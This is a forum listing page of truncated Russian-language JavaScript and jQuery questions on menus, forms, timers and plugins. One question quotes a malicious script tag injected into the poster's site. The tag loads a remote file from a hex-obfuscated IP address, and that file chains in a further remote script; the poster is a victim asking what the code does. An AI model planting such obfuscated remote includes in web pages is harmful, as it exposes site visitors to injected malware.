JavaScript
A programming language that conforms to the ECMAScript specification
Explore Questions
There are no popular questions to show right now
-
0 votes1 answer
-
0 votes0 answers
-
0 votes0 answers
-
0 votes1 answer
-
0 votes0 answers
4,723 questions in this forum
-
Переделка скрипта меню на JQuery
Нашел интересное выпадающее меню на JQuery. Демо. Прикрутил его на свой шаблон. Переделал под себя дизайн, но проблема в том что фон выпадающего меню сплошной, я же хочу сделать прозрачный, с закругленными краями и рамкой. Для этого мне нужно сделать три контейнера DIV, предварительно запихнув их в главный контейнер. В div-top положить шапку рамки, в div-content повторяющуюся среднюю, и нижнюю в div-bottom. Но сложность в том, что исходный скрипт распространяется только на один div ".sub", как туда вместить верхний и нижний контейнеры понятия не имею, потому что совсем не ориентируюсь ни в JQuery ни в Jave. Помогите если возможно, ну очень не хочется отказываться от краси…
0 votes3 answers -
Помогите
Люди столкнулся с такой проблемой: есть форма, и скрипт <script type="text/javascript"> window.onload = function() { var but = document.getElementById("button"); but.onclick = pro; } function pro() { var title = document.getElementById("title"); var text = document.getElementById("text"); if (title.value == "" || text.value == "") {alert("Заполнены не все поля")} } </script> <form id="form1" name="form1" method="post" action=""> <p> <input type="text" name="title" id="title" /> </p> <p> <textarea name="text" id="text" cols="45" rows="5"></textarea> </p> <p> <input type="submit" name="button" id="button" …
0 votes3 answers -
Для повышения эрудиции
Мои познания весьма скудны в этом вопросе, пользуюсь по большей части готовыми скриптами. Хочу узнать: JavaScript может работать с файлами? Врайт\реврайт\крейт и тд? И такой же вопрос про БД...
0 votes3 answers -
Динамичная замена div
Добрый день, уважаемые. Прошу помощи, т.к. сам далековат от яваскрипт и вообще верстки, но возникла экстренная необходимость это использовать. Описание: есть пункты меню (гифы), под которыми находится скрытый (до поры-до времени) див. При наведении на картинку (в зависимости от картинки) в этом диве отображается нужная инфа. Собственно реализация есть на vtb.ru, но код там слишком сложный, увы, разобраться не смог
0 votes4 answers -
Вопрос по .css() в JQuery
Элементу задаю инлайновые стили через .css() как можно безболезненно удалить какой то из заданых стилей например из этого <div style="height: 330px; display: block; left: 0px; top: 0px;"></div> получить <div style="height: 330px; display: block; left: 0px; "></div>
0 votes3 answers -
Вычисление координат
Здравствуй Народ, всех с НГ, наступающим Рождеством. Нужно сделать вот что: Есть 512 дивов, нужно при mouseover выводить его координату X Y через innerhtml или load jquery. К примеру: x=6 y=10 (то есть 6 рядок по горизонтали, 10 вертикаль (всего 16 рядов по X, по Y 32) ) В голову пришли пару решений, но они на мое мнение не кошерны... К примеру такое: $("#b1").mouseover(function(){$("#coords_xy").html("x(1); y(1);");}); $("#b2").mouseover(function(){$("#coords_xy").html("x(1); y(2);");}); ... $("#b512").mouseover(function(){$("#coords_xy").html("x(32); y(16);");}); и так 512 шт... Для чего и почему 512 шт не спрашивайте, секрет большой)))
0 votes5 answers -
Получить информацию о всех загруженых стилях
Есть ли возможность вообще в JS: Скажем загружается страница. К странице подключены стили (пример): <LINK REL=STYLESHEET TYPE="text/css" HREF="/cache/css_common.css"> <LINK REL=STYLESHEET TYPE="text/css" HREF="/cache/css_8.css"> Вот мне нужно получить полные список всех (селекторов, и прочей дребедени) в этих .css Это возможно? Вот к чему: Некоторые браузеры не поддерживают CSS3. А в стилях есть такие селекторы, возможно эти селекторы получить?
0 votes1 answer -
Java-скрипт перезагружает страницу, если он в форме, а вне её работает нормально
Всем доброго вечера. Прошу сразу прощения, если что не так. Календарь JSCal2-1.8 Если календарь находится в форме, то при нажатии на кнопку, он перезагружает страницу, а если вне формы, то нормально срабатывает. Всё голову сломал. Не знаю что делать. Надеюсь на помощь, потому что если это java-скрипт не работает, то и остальные использовать нельзя будет. В html код выглядит так. <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Администрирование новостей</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <script src="calendar/js/jscal2.js"></script> <script src…
0 votes2 answers -
Событие Confirm
Всех с наступившим 2011м! Подскажите, как прикрутить сообщение "да/нет" к <input type="image", и чтобы в случае отмены данные формы не отсылались. Банальный onClick не подходит...
0 votes4 answers -
jQuery, функция animate(), рекурсия
Здравствуйте! Есть некая игра (что-то наподобе шахмат), для которой на jQuery пишу "плейер". Плейер предназначен для того, чтобы показывать "запись" игры. Игра на двух человек, сначала ходит фигура одного игрока, потом другого, и т.д. Плейеру скармливаются все ходы в игре, он в соответствие с этими ходами перемещает фигуры на экране. Перемещение фигур должно поисходить так: движется одна фигура, когда она закончила движение, должна перемещаться следующая, и т.д. В jQuery есть функция animate(), в последнем параметре которой можно указать "конечную" функцию, которая вызывается в конце движения фигуры. Я могу указывать в качестве конечной функции метод начала обработки ново…
0 votes1 answer -
Слайдер не работает в IE7,8 и Opera
Привет всем. Есть сайт, горизонтальная прокрутка со стрелками не работает в IE7, IE8, Opera. Версия Jquery 1.4.4, если к примеру подключать версию 1.3.2 (как это в оригинальном плагине) то по идее должно всё работать, но у меня лезут ошибки.. Помогите разобраться пожалуйста.
0 votes4 answers -
Иконка на картинке
Здравствуйте, Нужна помощь, сам не справился =\. Есть страничка с картинками. Необходимо выбрать картинки определённого имени или ИД, и добавить к ним в нижнем правом углу иконку "Увеличить". Вот собственно и все дела =). Пробовал вычислять кординаты картинок, затем создавать див ( position:absolute ) с иконкой лупы и передвигать его на нужные кординаты страницы. К сожалению это не всегда правильно отображалось. Надо бы эти дивы создавать внутри самой картинки а не в таге <body>. А как мне создать или подкрепить див к картинке я не знаю =\. Помогите пожалуйста. Еслиб дело было с дивами то я бы просто изменял его innerHTML, в начале добавлял бы див, передвигал его н…
0 votes6 answers -
Растягивание и сжимание фона
Добрый день! Есть div. #wrapper { margin: 0 auto; max-width: 1600px; width: 98%; } Необходимо в него запихнуть фон, но таким образом, что бы он растягивался и сжимался пропорционально!!! Нашел несколько решений, но фон либо обрезается, либо сжимается не пропорционально... Помоги, пожалуйста. Заранее спасибо!
0 votes7 answers -
HTML-теги отображаются текстом
Здравствуйте! Постараюсь вкратце обрисовать проблему. Имеется два php-скрипта: index.php и ask.php. В index.php имеется форма, юзер заполняет ее - и при помощи MooTools Request.HTML данные из формы отправляются в ask.php. Без перезагрузки страницы (!) - т.е. на AJAX. В ask.php генерится определенный html-код (фактически, текст, разделенный тегами br) и возвращается в исходный сценарий: Формируется определенными преобразованиями переменная $answer, выполняется $answer = str_replace( array('<', '>'), array('<', '>'), $answer);, выводится echo $answer; Далее, при помощи JS, полученный ответ отображается в браузере (серия команд а-ля $('result').set('text', 'тек…
0 votes1 answer -
Поведение скрипта в ие
Добрый день. Такая проблема, на странице регистрации есть чекбокс "Создать учетную запись?". При отключение убираются поля логин и пароль. Все бы хорошо но в ие (пробовал 7 и 8 ) Они убираются только после еще одного щелчка на странице. При том в других браузерах все нормально. http://smart.gitcom.ru/index.php?option=co...on&Itemid=5 Код чекбокса <div class="formLabel"> <input type="checkbox" id="register_account" name="register_account" value="1" class="inputbox" onchange="showFields( this.checked, new Array(\'username\', \'password\', \'password2\') );if( this.checked ) { document.adminForm.remember.value=\'yes\'; } else { document.adminForm.remember.valu…
0 votes2 answers -
jQuery tooltip plugin, help!
В общем скрипт работает, все отлично. Только, он работает на одом изображение, хотя id(tonus) скрипта, всем изображениям присвоен. Помогите, в чем может быть проблема? вот оф.пример ( _http://jquery.bassistance.de/tooltip/demo/ ) _http://profshopping.ru/index.php?search=1&categoryID=347
0 votes1 answer -
jQuery + Mootools: noConflict
К сожалению, я один из тех, кто столкнулся с такой редкой проблемой.. Суть в том, что только на MooTools мне удалось найти необходимый для меня слайдер. В то время как jQuery использует: меню, модальные окна, табы и галерею. Поэтому подружить их - моя первоочередная задача. Единственный выход из положения - jQuery.noConflict(); - но вот как им воспользоваться я так и не понял. Я уже по всякому вызывал этот скрипт, но ничего не изменилось. <script type="text/javascript" src="jquery/jquery.js"></script> <script type="text/javascript" src="js/script.js"></script> <script type="text/javascript">jQuery.noConflict();</script> <script type=…
0 votes3 answers -
drag & drop jquery
Не могу понять как на квери сделать ползунок для скролла и боги гугла чтото не благосклонны к моим запросам Подскажите кто знает пс целую библиотеку квери UI с плагином drag & drop не хочется подключать ради одного метода
0 votes6 answers -
Некий вредоносный код
Google Chrome ругается на сайт и говорит, что он содержит данные с другого сайта, содержащий вредоносный код. На самом сайте в конце главной страницы обнаружил следующий код: <script src=http://0x4d.0xf2.0x00.0x0c/ad.js></script></script> В шестнадцатеричном виде написан ip-сайта 77.242.0.12. Перейдя по ссылке и открыв файл с js-кодом увидел следующее: <script>document.write('<script src=http:\/\/5602672652\/.../><\/script>');</script> Оставим вопрос о том, что кто-то мог внедриться на сайт и внести в его страницы эту бяку. Интересует, чем этот код вреден и что плохого он может сделать?
0 votes3 answers -
Подключение нескольких jQuery
Может быть не совсем по теме Есть страница к ней подключается jQuery и отключить его нельзя так как от него зависит другой код. Так же на странице есть код которому нужен тоже jQuery но новой версии при старой он не работает. Не работает и если подключать два сразу. Вопрос: возможно ли их изолировать JS, чтобы к некоторому коду на странице подключались только нужные js?
0 votes8 answers -
Объясните неучу
Пример. Хочу чтобы при наведение на фото, свойство opacity постепенно изменялось до 0, а если убрать мышь то возвращалось к исходному значению. Часть скрипта скопипасил с других ресурсов, поэтому сам понимаю его процентов на 90%. В частности зачем передавать event как аргумент в функцию opacityDown()? Если аккуратно то все нормально, но если быстро водить мышкой то не успевает отрабатывать. Где я просчитался? window.onload = function ready(){ var menuLi = document.getElementById('list').getElementsByTagName('li'); var fotoLi = document.getElementById('screenshot').getElementsByTagName('li'); for(var i=0;i<fotoLi.length;i++){ fotoLi[i].onmouseover=function opacity…
0 votes1 answer -
Новая страница + JQuery.show по одному клику
Помогите, не могу сообразить, как сделать. Есть несколько страниц, на всех есть один див #catalogue_extended с ссылкой на Каталог. Есть также меню сайта, тоже с ссылкой на каталог. Страница Каталог в двух состояниях: начальное и со всплывающим окошком, див #cat_popup. Так вот, нужно, чтобы когда ходишь по меню, Каталог открывался без попапа, а когда кликаешь на див #catalogue_extended, то Каталог нужно открыть, показывая попап. Делаю так: $("#catalogue_extended").click($(document).ready(function(){$("#cat_popup").show()})); - при навигации по меню Каталог открывается с попапом...
0 votes10 answers -
Функция disable для нескольких checkbox
На страницу в цикле выводится 10 форм с новостями. Каждая форма имеет свой уникальный ID и содержит в себе 4 checkbox. - удалить - опубликовать (это checkbox отмечен тегом checked) - на главную - инфо Задача у меня следующая: при нажатии на checkbox "УДАЛИТЬ" - остальные checkbox'ы деактивируются. Только нужно сделать это в пределах одной формы.
0 votes2 answers -
Как правильно писать ClearInterval
Пожалуйста, может кто-нибудь растолковать принцип синтексиса clearInterval ? У меня есть функция, запускающая так скажем бесконечный цикл с заданным интервалом: function AutoPlay() { setInterval('faderight()', 5500); } Я хочу другой функцией прерывать интервал этот. Если я пишу так: function AutoPlay() { var playint = setInterval('faderight()', 5500); } function AutoStop { playint = clearInterval(playint); } то при выскаакивает ошибка, что playint undefined. Как правильно поступать в данном случае? Как обратиться к циклу и застопить его правильно?
0 votes5 answers -
параметр disabled
нашёл то, что хотел но как в этом коде: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=windows-1251"> <title>Блокировка поля</title> <script type="text/javascript"> function agreeForm(f) { // Если поставлен флажок, снимаем блокирование кнопки if (f.agree.checked) f.submit.disabled = 0 // В противном случае вновь блокируем кнопку else f.submit.disabled = 1 } </script> </head> <body> <form action="handler.php"> <p><textarea cols="30" rows="4" readonly> Ти…
0 votes12 answers